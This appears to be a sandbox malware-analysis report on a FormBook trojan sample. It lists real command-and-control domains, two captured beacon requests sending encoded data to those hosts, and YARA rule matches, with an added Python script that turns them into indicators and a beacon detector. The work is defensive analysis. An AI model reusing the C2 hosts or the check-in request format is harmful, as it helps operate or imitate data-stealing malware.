Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.com/ar73/www.arredobagno.club
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.com/ar73/www.1wwuwa.top
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.info
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.info/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kellnovaglobalfood.infoReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africa
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africa/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mogi.africaReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.online
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.online/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.online/ar73/r
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mtevz.onlineReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.uk
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.quickhealcareltd.co.ukReferer:
Source: unknown DNS traffic detected: queries for: www.mogi.africa
Source: C:\Windows\explorer.exe Code function: 1_2_100D8F82 getaddrinfo,setsockopt,recv, 1_2_100D8F82
Source: global traffic HTTP traffic detected: GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1 Host: www.kellnovaglobalfood.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1 Host: www.controlplus.systems Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: 7pECKdsaig.exe, 00000000.00000002.289211291.000000000145A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
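The memory strings above are FormBook's decrypted C2 domain list as the sandbox's string extractor found it in explorer.exe: hosts run together with the /ar73/ path, and in places with a following "Referer:" string glued onto the host. The two captured GET requests show the check-in shape: a short directory, two query parameters (one a base64-looking blob, one a short identifier), a Host header, Connection: close and no User-Agent. The script below is an added example, not part of the Joe Sandbox report: it recovers the domain set and C2 path from those strings and uses them, plus the request shape, to flag beacons in captured HTTP traffic. The request bytes are the report's two requests re-serialised with CRLF line endings (an assumption; the report flattens them), the third request is constructed as a benign control, the treatment of the trailing "Referer:" as an adjacent string rather than part of the host is an assumption, and the regex thresholds for "C2 path" and "base64 blob" are the author's own heuristics.

```python
"""Added example: rebuild FormBook IOCs from sandbox memory strings and
flag matching HTTP beacons. Not code from the report or the sandbox."""
import re
from urllib.parse import urlsplit

# Memory strings copied from the report (explorer.exe dumps). One string can
# carry two hosts because the decrypted config lies contiguous in memory.
MEMORY_STRINGS = [
    "http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com",
    "http://www.jacksontcpassettlement.comReferer:",
    "http://www.kellnovaglobalfood.info",
    "http://www.kellnovaglobalfood.info/ar73/",
    "http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems",
    "http://www.mogi.africa/ar73/www.kellnovaglobalfood.info",
    "http://www.mtevz.online/ar73/r",
    "http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com",
]

HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")
PATH_RE = re.compile(r"^[a-z0-9]{2,8}$")            # e.g. "ar73" (assumed shape)
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # base64-looking value


def extract_indicators(strings):
    """Return (domains, c2_paths) recovered from sandbox memory strings."""
    domains, paths = set(), set()
    for s in strings:
        s = s.strip().lower()
        if s.startswith("http://"):
            s = s[len("http://"):]
        if s.endswith("referer:"):           # adjacent string, not an IOC (assumption)
            s = s[: -len("referer:")]
        for i, part in enumerate(s.split("/")):
            if HOST_RE.match(part):
                domains.add(part)
            elif i == 1 and PATH_RE.match(part):
                paths.add(part)               # only the segment right after a host
    return domains, paths


def parse_request(raw):
    """Minimal HTTP/1.1 request parser; query values are kept unescaped."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = dict(kv.partition("=")[::2] for kv in url.query.split("&") if kv)
    return {"method": method, "path": url.path, "query": query, "headers": headers}


def beacon_traits(req, domains, paths):
    """List the FormBook check-in traits a parsed request exhibits."""
    traits = []
    host = req["headers"].get("host", "").lower()
    first_seg = req["path"].strip("/").split("/")[0]
    if host in domains:
        traits.append("host in decrypted C2 list")
    if first_seg in paths:
        traits.append("known C2 path")
    values = list(req["query"].values())
    if req["method"] == "GET" and len(values) == 2:
        blob = any(BLOB_RE.match(v) for v in values)
        short = any(len(v) <= 12 and not BLOB_RE.match(v) for v in values)
        if blob and short:
            traits.append("two-parameter check-in with base64 blob")
    if "user-agent" not in req["headers"]:
        traits.append("no User-Agent")
    if req["headers"].get("connection", "").lower() == "close":
        traits.append("Connection: close")
    return traits


def scan(requests, strings):
    """Flag a request on any IOC hit, or on the full behavioural shape alone."""
    domains, paths = extract_indicators(strings)
    results = []
    for raw in requests:
        req = parse_request(raw)
        traits = beacon_traits(req, domains, paths)
        ioc_hit = "host in decrypted C2 list" in traits or "known C2 path" in traits
        results.append({"host": req["headers"].get("host", ""),
                        "flagged": ioc_hit or len(traits) >= 3,
                        "traits": traits})
    return results


# The report's two requests (CRLF re-added) plus one constructed benign request.
REQUESTS = [
    b"GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1\r\n"
    b"Host: www.kellnovaglobalfood.info\r\nConnection: close\r\n\r\n",
    b"GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1\r\n"
    b"Host: www.controlplus.systems\r\nConnection: close\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

if __name__ == "__main__":
    for r in scan(REQUESTS, MEMORY_STRINGS):
        print(r["host"], "FLAGGED" if r["flagged"] else "clean", r["traits"])
```

Two things worth noting when using this against real captures. The second request goes to www.controlplus.systems, a host that never appears at the start of a memory string; it is only recovered because the parser walks every "/"-separated segment, which is why splitting the concatenated strings matters more than the leading-host match. And the behavioural traits are deliberately kept separate from the IOC hit, so that a new campaign with a fresh domain list and a different four-character directory still scores on the two-parameter check-in, the missing User-Agent and Connection: close.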

E-Banking Fraud

Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 7pECKdsaig.exe PID: 6000, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 3452, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7pECKdsaig.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7pECKdsaig.exe, type: SAMPLE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
